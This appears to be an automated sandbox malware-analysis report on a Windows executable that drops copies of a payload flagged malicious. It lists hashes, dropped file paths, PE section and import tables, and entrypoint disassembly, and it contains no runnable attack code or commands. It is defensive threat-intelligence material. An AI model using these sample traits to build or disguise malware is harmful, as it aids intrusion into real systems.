                                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.9.8.5.7.9.3.6.2.9.8.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.8.9.8.5.7.9.8.1.6.1.0.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.8.3.e.4.d.8.2.-.f.0.9.f.-.4.e.f.8.-.a.8.5.f.-.a.b.f.4.b.4.c.a.d.b.0.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.e.1.1.1.e.4.-.8.a.7.b.-.4.2.4.2.-.a.8.c.c.-.f.6.2.5.7.8.0.6.e.2.7.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.1.B.1...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.2.0.-.0.0.0.1.-.0.0.1.3.-.0.1.b.4.-.4.4.a.4.5.f.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.d.a.0.7.9.f.8.3.c.e.c.c.f.f.a.e.a.9.2.4.b.2.3.3.b.b.9.5.a.f.a.0.0.0.0.f.f.f.f.!.0.0.0.0.5.e.1.4.6.c.1.8.7.1.7.f.7.a.a.8.c.b.d.2.2.6.e.c.7.5.0.b.c.e.4.1.b.d.8.a.a.4.b.3.!.9.1.B.1...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F0F.tmp.dmp

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Dec 17 08:42:59 2024, 0x1205a4 type
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):45990
                                                                                                                                                                                                                                          Entropy (8bit):2.5480841669698266
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:b4Qa8RXXMBqIOx1B6NoTjju9g3jrWgHzp3T0s9WFcCasaxhP/tFKzNf5:La1BOTBtT24THzxwaXVFIp5
                                                                                                                                                                                                                                          MD5:5328C90F9A1BBCE2C726B9424FB8C8FF
                                                                                                                                                                                                                                          SHA1:EC19E4BA8A98B402EA7B9D00173C2727E6380D98
                                                                                                                                                                                                                                          SHA-256:D7C7F33629156E91F7E85B95D39F2E923503156D6FC45C72818AB99AD30D8747
                                                                                                                                                                                                                                          SHA-512:2A32CA871CC406B7C25892CED116FBC2C33B9A6D97F89BA7DBD4535FFF477295A6A08456B30EE067F66F6534F35702A89C67D127D569DAD4869A2AD52239E9D5
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview:MDMP..a..... ........9ag............4...............H...........<.......t....,..........`.......8...........T............A...r......................................................................................................eJ......D ......GenuineIntel............T....... ....9ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FEB.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8286
                                                                                                                                                                                                                                          Entropy (8bit):3.7016541061973567
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJda6X6Y0W6jqgmfjmUjgUpDt89bRWsfoQbm:R6lXJg6X6Yd6ugmfVgTR1fK
                                                                                                                                                                                                                                          MD5:2F69279911E35E320DD1D1D8A3715DF7
                                                                                                                                                                                                                                          SHA1:5836A1E152FAB27674604B5496831E97B778C978
                                                                                                                                                                                                                                          SHA-256:D19BA928C236250F9A462DD7157FEBA33C89A0BF1EA4E3BF6ED1885AC8FC249C
                                                                                                                                                                                                                                          SHA-512:06499496CB9AC98A031504256207BCB0F2F1887866925DACD2E985A7E4DE9FC4B681774BD560E34F9AF4C7F8EB89C1E3AF0EAF0951BAAC1911B3C662DE0E4F0E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.6.8.<./.P.i.

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA01A.tmp.xml

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4565
                                                                                                                                                                                                                                          Entropy (8bit):4.445422187605192
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs9Jg77aI9WhnWpW8VY5Ym8M4JmLc91wcFOcI+q8h6dMCHmZquz+uId:uIjfXI7shW7VpJlI2xzLId
                                                                                                                                                                                                                                          MD5:E27F2B3B33373BCFF329E97285127B00
                                                                                                                                                                                                                                          SHA1:F14A6E65A1E3ACE4CB03CA23099708EEBECE3728
                                                                                                                                                                                                                                          SHA-256:A4E1349DB3B2A96CE286F84C72E00576AC0A1BCB3385271400786911C36D7885
                                                                                                                                                                                                                                          SHA-512:30FECC85D577E87CA329CAACD7E531EE8CD1FF8FE566468C64C734D86F60A4195F7941E9E0A7E3BB166D334586DA66E803B99A51734A6CD156016CA46AEB307A
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="635025" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\hpEAJnNwCB.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):367616
                                                                                                                                                                                                                                          Entropy (8bit):6.6925040559075155
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:hT46u0Jny38rm3bYIOhtVlJ2rlC0vGLfAq0TwdLZc:hT46uIysrm3bY51+nODFMwPc
                                                                                                                                                                                                                                          MD5:CC2566EAE03240FFC314E5BEE2DC4D26
                                                                                                                                                                                                                                          SHA1:5E146C18717F7AA8CBD226EC750BCE41BD8AA4B3
                                                                                                                                                                                                                                          SHA-256:9F2583D6908053C7FDF7E8B2DA4F578432E761ADBF11CBEAB3B78B7DA71ED843
                                                                                                                                                                                                                                          SHA-512:62F09B2AD6609ED4730D661F23BD4BB53DF1EC8A9A9E305E3BC3945CE61F1641666ADFC902998C4656A8EE224C816188664373E5E269F54D140A79221463B19D
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.)..rGA.rGA.rGA.=.A.rGA. .A.rGA. .A.rGA. .AerGA,.<A.rGA.rFA}rGA. .A.rGA. .A.rGA. .A.rGARich.rGA........................PE..L....m.e.....................&?.....w.............@.......................... C..............................................)..<.....B..............................................................................................................text............................... ..`.rdata...#.......$..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\91B1.tmp.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\hpEAJnNwCB.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):367616
                                                                                                                                                                                                                                          Entropy (8bit):6.6925040559075155
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:hT46u0Jny38rm3bYIOhtVlJ2rlC0vGLfAq0TwdLZc:hT46uIysrm3bY51+nODFMwPc
                                                                                                                                                                                                                                          MD5:CC2566EAE03240FFC314E5BEE2DC4D26
                                                                                                                                                                                                                                          SHA1:5E146C18717F7AA8CBD226EC750BCE41BD8AA4B3
                                                                                                                                                                                                                                          SHA-256:9F2583D6908053C7FDF7E8B2DA4F578432E761ADBF11CBEAB3B78B7DA71ED843
                                                                                                                                                                                                                                          SHA-512:62F09B2AD6609ED4730D661F23BD4BB53DF1EC8A9A9E305E3BC3945CE61F1641666ADFC902998C4656A8EE224C816188664373E5E269F54D140A79221463B19D
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.)..rGA.rGA.rGA.=.A.rGA. .A.rGA. .A.rGA. .AerGA,.<A.rGA.rFA}rGA. .A.rGA. .A.rGA. .A.rGARich.rGA........................PE..L....m.e.....................&?.....w.............@.......................... C..............................................)..<.....B..............................................................................................................text............................... ..`.rdata...#.......$..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                                                                          Entropy (8bit):4.295945183521544
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:q41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+yG5mBMZJh1Vjy:z1/YCW2AoQ0NiwG5wMHrVO
                                                                                                                                                                                                                                          MD5:58735CD5409BAA4C8768A4C49896E1B7
                                                                                                                                                                                                                                          SHA1:634ED7EA24DB86C04BAD292F95614DFB0E506CFF
                                                                                                                                                                                                                                          SHA-256:457EE7825D6F727CE503A9D86808F697E1E7291691776B0BA6BA9E12ECBC1459
                                                                                                                                                                                                                                          SHA-512:0F58A6DABA1BAA8877D0D5D67E658C6FA7AB1108BBDF9AC118DF3E7F4959F6B57D45C2EF792C57967467AD57774FCF2EB1775AA5D59786D82024B415A78CE43B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.W.._P..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Entropy (8bit):7.023453801819406
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                          File name:hpEAJnNwCB.exe
                                                                                                                                                                                                                                          File size:435'712 bytes
                                                                                                                                                                                                                                          MD5:07a0b87962fbee50d2adc913f06a3e3b
                                                                                                                                                                                                                                          SHA1:1d8772e4953a5644fed016c3603f7db6aeffaa2a
                                                                                                                                                                                                                                          SHA256:85e572ae248f77ea01360746b27349c2baed236a9790e1c1ec7889d35ee1787f
                                                                                                                                                                                                                                          SHA512:1fa95888d25720d95e34b1ed23c8da6ed65ce4bf54b65946162d4ae13c1b5bbdf4e980caeb4035596d77b121ad000f41fbd831933e0392bbf81fc05333552fcb
                                                                                                                                                                                                                                          SSDEEP:6144:RAk0A0JKGFK5aIHpqojgkngvI2yu8LOzKxmQTlO1o3lOS/TwdsQ7Mz:RAk0AfVaNojHgQ2E+Kx/Zqo3hbwKrz
                                                                                                                                                                                                                                          TLSH:C994E01171F19622E3F34A75793AE7A46E3BB9726E34569E2358162F0E313D1CE22703
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.)..rGA.rGA.rGA.=.A.rGA. .A.rGA. .A.rGA. .AerGA,.<A.rGA.rFA}rGA. .A.rGA. .A.rGA. .A.rGARich.rGA........................PE..L..

                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                          Icon Hash:46c7c30b0f4e0d59

                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Entrypoint:0x401877
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0x667351F9 [Wed Jun 19 21:47:37 2024 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:f9df41ae4b2e96d07a46131787a7a3b9

                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          call 00007F8BFC4D180Bh
                                                                                                                                                                                                                                          jmp 00007F8BFC4CDE8Dh
                                                                                                                                                                                                                                          mov edi, edi
                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                                          sub esp, 00000328h
                                                                                                                                                                                                                                          mov dword ptr [00456C38h], eax
                                                                                                                                                                                                                                          mov dword ptr [00456C34h], ecx
                                                                                                                                                                                                                                          mov dword ptr [00456C30h], edx
                                                                                                                                                                                                                                          mov dword ptr [00456C2Ch], ebx
                                                                                                                                                                                                                                          mov dword ptr [00456C28h], esi
                                                                                                                                                                                                                                          mov dword ptr [00456C24h], edi
                                                                                                                                                                                                                                          mov word ptr [00456C50h], ss
                                                                                                                                                                                                                                          mov word ptr [00456C44h], cs
                                                                                                                                                                                                                                          mov word ptr [00456C20h], ds
                                                                                                                                                                                                                                          mov word ptr [00456C1Ch], es
                                                                                                                                                                                                                                          mov word ptr [00456C18h], fs
                                                                                                                                                                                                                                          mov word ptr [00456C14h], gs
                                                                                                                                                                                                                                          pushfd
                                                                                                                                                                                                                                          pop dword ptr [00456C48h]
                                                                                                                                                                                                                                          mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                          mov dword ptr [00456C3Ch], eax
                                                                                                                                                                                                                                          mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                          mov dword ptr [00456C40h], eax
                                                                                                                                                                                                                                          lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                          mov dword ptr [00456C4Ch], eax
                                                                                                                                                                                                                                          mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                          mov dword ptr [00456B88h], 00010001h
                                                                                                                                                                                                                                          mov eax, dword ptr [00456C40h]
                                                                                                                                                                                                                                          mov dword ptr [00456B3Ch], eax
                                                                                                                                                                                                                                          mov dword ptr [00456B30h], C0000409h
                                                                                                                                                                                                                                          mov dword ptr [00456B34h], 00000001h
                                                                                                                                                                                                                                          mov eax, dword ptr [00454004h]
                                                                                                                                                                                                                                          mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                          mov eax, dword ptr [00454008h]
                                                                                                                                                                                                                                          mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                          call dword ptr [000000C8h]

                                                                                                                                                                                                                                          Rich Headers

                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                          • [C++] VS2008 build 21022
                                                                                                                                                                                                                                          • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                          • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                          • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                          • [RES] VS2008 build 21022
                                                                                                                                                                                                                                          • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x529fc0x3c.rdata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4310000x10ca8.rsrc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x525580x40.rdata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x510000x194.rdata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                          .text0x10000x4fe6c0x500005e798783628d3816e27517d6fbaf4547False0.8434112548828125data7.543282648713042IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .rdata0x510000x230e0x2400fb75eb231dfcb7959eefbe2ed90fab32False0.3597005208333333data5.435459920506363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .data0x540000x3dc4bc0x7000b8ba256305db9de2431645ec9d5e1375unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                          .rsrc0x4310000x10ca80x10e000cc7cdf18cd3f89909ec9aa250611168False0.5896556712962963data5.799259140137772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                          RT_ICON0x4315b00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.5101279317697228
                                                                                                                                                                                                                                          RT_ICON0x4324580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.5658844765342961
                                                                                                                                                                                                                                          RT_ICON0x432d000x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.6002304147465438
                                                                                                                                                                                                                                          RT_ICON0x4333c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.6394508670520231
                                                                                                                                                                                                                                          RT_ICON0x4339300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.4099585062240664
                                                                                                                                                                                                                                          RT_ICON0x435ed80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.4793621013133208
                                                                                                                                                                                                                                          RT_ICON0x436f800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.47704918032786886
                                                                                                                                                                                                                                          RT_ICON0x4379080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.5806737588652482
                                                                                                                                                                                                                                          RT_ICON0x437de80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.8171641791044776
                                                                                                                                                                                                                                          RT_ICON0x438c900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.8407039711191335
                                                                                                                                                                                                                                          RT_ICON0x4395380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.7932027649769585
                                                                                                                                                                                                                                          RT_ICON0x439c000x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.7117052023121387
                                                                                                                                                                                                                                          RT_ICON0x43a1680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.8053941908713693
                                                                                                                                                                                                                                          RT_ICON0x43c7100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.8320825515947468
                                                                                                                                                                                                                                          RT_ICON0x43d7b80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.8450819672131148
                                                                                                                                                                                                                                          RT_ICON0x43e1400x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8634751773049646
                                                                                                                                                                                                                                          RT_STRING0x43e7d80x386data0.4567627494456763
                                                                                                                                                                                                                                          RT_STRING0x43eb600xb2data0.601123595505618
                                                                                                                                                                                                                                          RT_STRING0x43ec180x6d0data0.4288990825688073
                                                                                                                                                                                                                                          RT_STRING0x43f2e80x71edata0.4313940724478595
                                                                                                                                                                                                                                          RT_STRING0x43fa080x6e2data0.43473325766174803
                                                                                                                                                                                                                                          RT_STRING0x4400f00x65cdata0.43611793611793614
                                                                                                                                                                                                                                          RT_STRING0x4407500x71adata0.4251925192519252
                                                                                                                                                                                                                                          RT_STRING0x440e700x7c4data0.4200201207243461
                                                                                                                                                                                                                                          RT_STRING0x4416380x66adata0.43118148599269185
                                                                                                                                                                                                                                          RT_GROUP_ICON0x43e5a80x76dataTurkmenTurkmenistan0.6694915254237288
                                                                                                                                                                                                                                          RT_GROUP_ICON0x437d700x76dataTurkmenTurkmenistan0.6610169491525424
                                                                                                                                                                                                                                          RT_VERSION0x43e6200x1b8COM executable for DOS0.5636363636363636

                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                          KERNEL32.dllGetFileSize, SearchPathW, SetLocaleInfoA, InterlockedIncrement, GetConsoleAliasA, InterlockedDecrement, SetDefaultCommConfigW, ReadConsoleOutputAttribute, GetEnvironmentStringsW, Process32First, SetComputerNameW, GetTimeFormatA, SetEvent, GetProcessPriorityBoost, GetModuleHandleW, GetCommandLineA, GetEnvironmentStrings, LoadLibraryW, ReadProcessMemory, DeleteVolumeMountPointW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, BuildCommDCBW, GetNumaHighestNodeNumber, GetAtomNameA, LoadLibraryA, LocalAlloc, AddAtomW, FoldStringA, CreatePipe, GetModuleHandleA, UpdateResourceW, OpenFileMappingW, GetShortPathNameW, FindFirstVolumeA, GetVersionExA, UnregisterWaitEx, SetFileAttributesW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, HeapAlloc, MultiByteToWideChar, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
                                                                                                                                                                                                                                          USER32.dllGetProcessDefaultLayout

                                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                          TurkmenTurkmenistan

                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
